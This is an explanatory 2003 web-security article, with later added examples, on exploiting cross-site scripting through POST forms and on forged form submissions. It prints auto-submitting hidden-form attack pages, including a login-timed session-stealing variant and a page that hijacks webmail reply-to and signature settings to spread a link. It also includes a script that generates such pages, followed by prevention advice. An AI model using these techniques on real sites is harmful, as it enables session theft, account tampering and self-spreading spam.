
Advanced Cross Site Scripting
by Gavin Zuchlinski, http://libox.net/, 10/16/2003

Table of Contents

Introduction
POST Method
Expansion on POST: secure areas
Generalized Client Automation
Prevention

Introduction

I recently read in an article the incorrect statement that cross site scripting (XSS) cannot be exploited if the POST method is used instead of GET, which is completely false. The method used to exploit POST variables may also be modified to allow for more advanced timing attacks, which could let an attacker gain access to areas that require the user to log in to a password protected area. When coupled with social engineering this method becomes an extremely reliable tool for attackers to gain access to secured areas via account hijacking.

In typical cross site scripting the target views a website which contains code inserted into the HTML that was not written by the website designer or administrator. This bypasses the browser's origin restrictions (the same-origin policy), which are intended to keep a site's cookies (sessions, settings, etc.) out of reach of other domains, because the injected code runs as part of the vulnerable site itself. In most instances the target is sent a link to a website on a server where the target has a legitimate account, and by viewing that website the attacker's malicious code is executed (commonly JavaScript that sends the user's cookie to a third party server, in effect stealing their session and their account). This was a quick overview of cross site scripting; a solid foundation is needed before proceeding, and my recommended reading is iDefense's XSS article (search google.com for it). The attack presented below, in conjunction with iDefense's method of attack automation, makes for a very powerful combination.

NOTE (October 17 2003) - Sverre Huseby has brought to my attention that the generalized version of the attack is not unique; it was discovered first by Jim Fulton (http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan) without my knowledge.

POST Method

Because POST variables are sent separately from the website URL, a direct attack in which the target clicks a malicious link and immediately hits the server vulnerable to the XSS attack is not possible (as far as I know). This is in contrast to a GET request, where the variable arguments are stored in the URL, such as http://www.google.com/search?hl=en&q=xss where the variables hl and q are visible in the URL. The implications of variables being sent in this manner are outside the scope of this article, but the POST method sends variables in the body of the HTTP request, not in the URL as is the case with GET.

To exploit a web page with a cross site scripting vulnerability via a GET variable, a URL of the form http://vulnerable.com/search?q=<script>alert(document.cookie)</script> is composed. This URL is then sent to the target; upon clicking it they are taken to vulnerable.com's handy search engine (not to mention that it renders the submitted HTML as part of the results page) and the target receives a JavaScript pop up containing their session cookie.

Creating exploits for POST requests is only trivially more difficult: an intermediary web page is needed which holds code that forces the client's browser into making the POST request to the vulnerable server. This is done via a form (with method POST and the target script as its action) and JavaScript code which automatically submits the form on page load. See the example code block below.

    <form method="POST" action="http://vulnerable.com/search" name="explForm">
    <input type="hidden" name="q" value="<script>alert(document.cookie)</script>">
    </form>
    <script language="javascript">
    /* submit the hidden form one millisecond after the page loads */
    setTimeout(function () { document.forms.explForm.submit(); }, 1);
    </script>

One millisecond after the page containing this code is loaded, the form (completely invisible in the rendered HTML) is submitted. In this case you have a simple search for "<script>alert(document.cookie)</script>" done on vulnerable.com's search engine (and consequently a JavaScript alert appears because, for the sake of this paper, vulnerable.com's search engine is vulnerable to a cross site scripting attack). The above code can easily be changed if the target script requires variables to be sent via GET: change method="POST" to method="GET".

The above code can be placed on a static web page on a web server controlled by the attacker and the link then sent to the target. Another vector for delivering the form and JavaScript to the target is via a site vulnerable to XSS through a GET request. In either case the attacker sends the target the malicious web page, the malicious web page forms the request, and the request is sent to the vulnerable server. This advances the classical cross site scripting attack from a single hop (target --> page within vulnerable website containing inserted code) to two hops (target --> intermediary request formulation page --> page within vulnerable website containing inserted code).

Expansion on POST: secure areas

The problem of password protected areas also arises, where a password is required every time the user accesses the website. Many websites which require secure client access do not make the session cookie persistent, to prevent other users of the same computer from logging in to the account. Building upon the code presented above we can circumvent any such restriction and still steal the session cookie for the temporary session. Unfortunately the time window in which the attack can take place is in many cases very small; with the help of iDefense's idea of automating attacks this small time window is no longer an issue. By adding code on the intermediary web page which opens a new window with the login prompt, the user may now log in to the secured area (some social engineering might be required in order to persuade the user to log in). See the code below.

    <form method="POST" action="http://vulnerable.com/search" name="explForm">
    <input type="hidden" name="q" value="<script>alert(document.cookie)</script>">
    </form>
    <script language="javascript">
    /* open the real login page in a new window for the target to log in to */
    window.open('http://vulnerable.com/secure_login');
    /* submit the hidden form after a delay long enough for the login (one minute here) */
    setTimeout(function () { document.forms.explForm.submit(); }, 1000 * 60);
    </script>

Note: the changes from the previous code are the window.open() call and the longer timeout.

With the intermediary web page still in the background, the form submission may now be timed to allow the user to log in successfully before the exploit is sent. To change the time until the form is submitted, change the second argument of setTimeout: it is the time in milliseconds until the code given in the first argument is executed. With the user successfully logged in within a child window of the intermediary web page, when the form on the intermediary web page is submitted it goes directly to the problematic script with the malicious code inserted, and the user's session may be stolen. The attack works because the browser attaches vulnerable.com's cookies to the submitted request regardless of which page created the form. (Modern browsers that treat cookies as SameSite=Lax by default, as Chromium-based ones do, generally no longer send the session cookie with a cross-site POST unless the site sets SameSite=None, which narrows this vector considerably.) Using an intermediary for exploitation slightly increases the complexity of a successful attack but allows for a high degree of flexibility: any variable that is used on a dynamically created web page which does not sanitize HTML markup is vulnerable to cross site scripting.
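As an added example (not code from the original article), the following Node.js script generates the intermediary page described in this and the previous section as a string, so the escaping of the payload inside the hidden input and the exact form body the browser will send can be checked offline. The function names, the vulnerable.com URLs and the one-minute delay are assumptions for illustration; the generated page is equivalent to the two hand-written forms above, except that the payload is attribute-escaped so it survives HTML parsing unchanged whatever characters it contains.

```javascript
// Added example, not from the original article. Names and URLs are
// assumptions for illustration. Run with Node.js.

// Escape text for use inside a double-quoted HTML attribute so that the XSS
// payload (which contains < > and quotes) is carried intact in the hidden
// input rather than terminating the attribute or being parsed as markup.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// The application/x-www-form-urlencoded body the browser sends on submit
// (or the query string, if the form method is GET).
function encodeFormBody(fields) {
  return new URLSearchParams(fields).toString();
}

// Build the attacker's intermediary page.
//   action           URL of the vulnerable script (assumed: a search page)
//   fields           name/value pairs to submit; values may hold the payload
//   options.method   'POST' (default) or 'GET'
//   options.delayMs  wait before submitting; 1 ms for the basic case
//   options.loginUrl if set, open a login window first (secure-areas variant)
function buildIntermediaryPage(action, fields, options) {
  options = options || {};
  const method = (options.method || 'POST').toUpperCase();
  const delayMs = options.delayMs === undefined ? 1 : options.delayMs;
  const inputs = Object.keys(fields).map(function (name) {
    return '  <input type="hidden" name="' + escapeAttr(name) +
      '" value="' + escapeAttr(fields[name]) + '">';
  });
  const script = [];
  if (options.loginUrl) {
    // JSON.stringify quotes the URL; "<" is escaped so the string can never
    // close the enclosing <script> element.
    script.push('  window.open(' +
      JSON.stringify(options.loginUrl).replace(/</g, '\\u003c') + ');');
  }
  script.push('  setTimeout(function () { document.forms.explForm.submit(); }, ' +
    delayMs + ');');
  return [
    '<form method="' + method + '" action="' + escapeAttr(action) + '" name="explForm">',
  ].concat(inputs, ['</form>', '<script>'], script, ['</script>']).join('\n');
}

const PAYLOAD = '<script>alert(document.cookie)</script>';

// The article's first page: submit 1 ms after load.
function basicPage() {
  return buildIntermediaryPage('http://vulnerable.com/search', { q: PAYLOAD });
}

// The article's second page: open the login prompt, submit after one minute.
function timedPage() {
  return buildIntermediaryPage('http://vulnerable.com/search', { q: PAYLOAD }, {
    loginUrl: 'http://vulnerable.com/secure_login',
    delayMs: 60 * 1000,
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(basicPage());
  console.log(encodeFormBody({ q: PAYLOAD }));
}
```

Running the script prints the generated page followed by the encoded body `q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E`, which is exactly what the vulnerable search script receives and decodes back into the payload.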

Generalized Client Automation

Generalizing on the above technique brings to light another, and in some cases very serious, vulnerability (what is now generally called cross-site request forgery). The technique allows an attacker to fill out forms with data they specify and submit them automatically in the context of the client. Any form which accepts data from the client on the assumption that the client actually entered the data being submitted is vulnerable. This arises when the form itself depends only on static or predictable information (information given away to a third party site, such as the referrer, can help in prediction). Using the method of exploitation presented above, client automation of form submission is a trivial task.

    <form method="POST" action="http://vulnerable.com/changeMailSettings" name="f">
    <input type="hidden" name="reply_to" value="attacker@h0x.com">
    <input type="hidden" name="signature" value='<a href="http://h0x.com/exploit.htm">Click here</a> for a free computer security test, trust me, I used it and was amazed!'>
    </form>
    <script language="javascript">
    /* submit immediately on page load, in the victim's logged-in session */
    document.forms.f.submit();
    </script>

An interesting use of this would be the creation of a webmail signature virus. Using the techniques presented above the attacker could compose a web page that, when visited, would automate the form which changes the signature sent out on emails so that it contains the link to the malicious page itself. Every time a user "infected" with the signature virus sent an email they would unknowingly also send along text and a link persuading the next victim to click it and become infected. Easy automated spamming? Yes.

Hotmail and Yahoo! Mail have both been tested for this vulnerability and are secure against it, however each appears to have combated the flaw in a very different way. Hotmail uses a simple referrer check: if the referrer is not an authorized Hotmail page the user is sent directly to a login page. Yahoo enacted a very novel approach to fix the problem: on each form there is a hidden value named ".crumb" which is derived from the cookie. All protection against this flaw lies within the crumb; if the crumb can be predicted without the cookie then Yahoo is vulnerable to this flaw.

Prevention

Because the generalized client automation attack looks entirely ordinary at the server end (the server sees what appears to be a legitimate request by the client) it is somewhat more difficult to prevent. Because the client's own browser forms the request, HTTP Referer headers can be used and should be validated to ensure that requests come from an internal script inside the system. Referer checking assumes, however, that the attacker cannot insert arbitrary HTML into any of the trusted scripts, though such an attack would be considered cross site scripting and is separate from this. A practical caveat: the Referer header is frequently absent (proxies, privacy settings and the attacker's own page can all suppress it), so a check must reject requests without one, and an unpredictable per-session token such as Yahoo's crumb is the more robust option.

At the very minimum, to protect against cross site scripting attacks user input must be stripped of any potentially dangerous characters such as < > " &, and output should be encoded for the HTML context in which it is rendered. As any conscientious security professional would do, I must preach the importance of the whitelisting approach over blacklisting; in whitelisting only explicitly allowed characters are permitted in the input. It appears that all security vulnerabilities stem from user input: "Hello world" cannot be exploited unless the attacker can manage, in some form, to input data. This should lead us to believe that it is trivial to ensure security (in a large number of cases, but not all) by validating user input against a strict form. Regular expressions are extremely powerful for the task of whitelisting characters and validating that data does in fact conform to the form's standards (include length constraints also in the concept of form). Once data is validated against a set of criteria, security analysis becomes purely creative thinking about how the criteria might be manipulated to let through specific items they should not.

Another option to aid in the prevention of security flaws is a project I am affiliated with, currently code named Nirvana. This project is devoted to the creation of user input filters and validation functions to help developers create secure code faster. The project page is now housed at http://libox.net/sanitize.php but will soon be moving to http://www.owasp.org. My home on the web is http://libox.net/; the most current version of this document may be found there.
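As an added example (not code from the article's Nirvana project), the following JavaScript shows whitelist validation of a search term with a regular expression that also enforces a length limit, beside HTML escaping of what the search page echoes back. The allowed character set, the 64-character limit, the function names and the sample inputs are constructed for illustration.

```javascript
// Added example, not the article's or the Nirvana project's code. The
// whitelist, length limit and sample inputs are assumptions for illustration.

// Whitelist for a search term: letters, digits, space and a little
// punctuation, 1 to 64 characters. Anything else (including < > " & and
// control characters) is rejected outright rather than stripped, so there is
// no stripped-and-reassembled payload to reason about (for example
// "<scr<script>ipt>" after removing "<script>" would still read "<script>").
const SEARCH_TERM = /^[A-Za-z0-9 _.,'-]{1,64}$/;

function validateSearchTerm(input) {
  return typeof input === 'string' && SEARCH_TERM.test(input);
}

// Escape for an HTML text or double-quoted attribute context. Validated data
// is still encoded on output, because a whitelist chosen for one field is
// not necessarily safe in every context the value is later rendered in.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Render the "results for ..." line the vulnerable search page in the
// article would emit, but safely: reject bad input, encode good input.
function renderSearchEcho(q) {
  if (!validateSearchTerm(q)) {
    return '<p>Invalid search term.</p>';
  }
  return '<p>Results for "' + escapeHtml(q) + '"</p>';
}

// Blacklist approach from the article's "very minimum", for comparison:
// it mangles the payload instead of rejecting the request, and silently
// changes the user's data.
function stripDangerous(s) {
  return String(s).replace(/[<>"&]/g, '');
}
```

Run against the article's payload, `validateSearchTerm` rejects it and `renderSearchEcho` never reflects it; `stripDangerous` turns it into `scriptalert(document.cookie)/script`, harmless in an HTML text context but a silent alteration of the user's input rather than a validation failure.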
